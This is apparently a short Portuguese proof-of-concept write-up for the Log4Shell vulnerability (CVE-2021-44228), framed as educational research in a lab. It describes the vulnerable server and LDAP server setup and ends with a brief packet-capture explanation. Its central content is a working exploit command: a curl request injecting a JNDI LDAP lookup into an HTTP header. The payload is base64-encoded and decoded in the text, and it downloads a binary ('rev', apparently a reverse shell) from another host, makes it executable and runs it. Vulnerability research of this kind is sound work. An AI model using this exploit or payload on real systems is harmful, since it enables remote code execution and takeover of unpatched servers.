
Exploit de prova de conceito para Log4Shell (CVE-2021-44228) com configuração de servidor LDAP, geração de payload e análise de captura de pacotes para pesquisa educacional de vulnerabilidades.
Log4Shell — também conhecido como CVE-2021-44228 — é uma vulnerabilidade crítica que permite execução remota de código em sistemas que utilizam o Log4j da Apache Foundation, que é uma biblioteca Java de código aberto amplamente utilizada em produtos de software comerciais e de código aberto e utilitários.

Análise do PoC
O servidor vulnerável está rodando na porta 8080

E o servidor ldap está rodando em duas portas: http 8888 e ldap 1389

COMANDO DO EXPLOIT
curl 172.17.0.2:8080 -H 'X-Api-Version: ${jndi:ldap://172.17.0.1:1389/Basic/Command/Base64/d2dldCBodHRwczovLzEwLjAuMi4xNTo4MDAwL3JldiAtTyAvdG1wL3JldiAmJiBjaG1vZCAreCAvdG1wL3JldiAmJiAvdG1wL3Jldg==}'
{
172.17.0.2:8080 -- IP do servidor vulnerável
172.17.0.1:1389 -- IP do servidor LDAP
Base64 -- d2dldCBodHRwczovLzEwLjAuMi4xNTo4MDAwL3JldiAtTyAvdG1wL3JldiAmJiBjaG1vZCAreCAvdG1wL3JldiAmJiAvdG1wL3Jldg==
Comando descriptografado - wget https://10.0.2.15:8000/rev -O /tmp/rev && chmod +x /tmp/rev && /tmp/rev
}
ANÁLISE DE PACOTES


COMO PODEMOS VER NOS PACOTES, O SERVIDOR ESTÁ ENVIANDO UMA REQUISIÇÃO GET PARA UMA CLASSE PARA O SERVIDOR LDAP. SE VERIFICARMOS A CLASSE DO EXPLOIT, PODEMOS VER QUE O SERVIDOR LDAP ESTÁ ENVIANDO O COMANDO DESCRIPTOGRAFADO NA CLASSE DO EXPLOIT.

Referências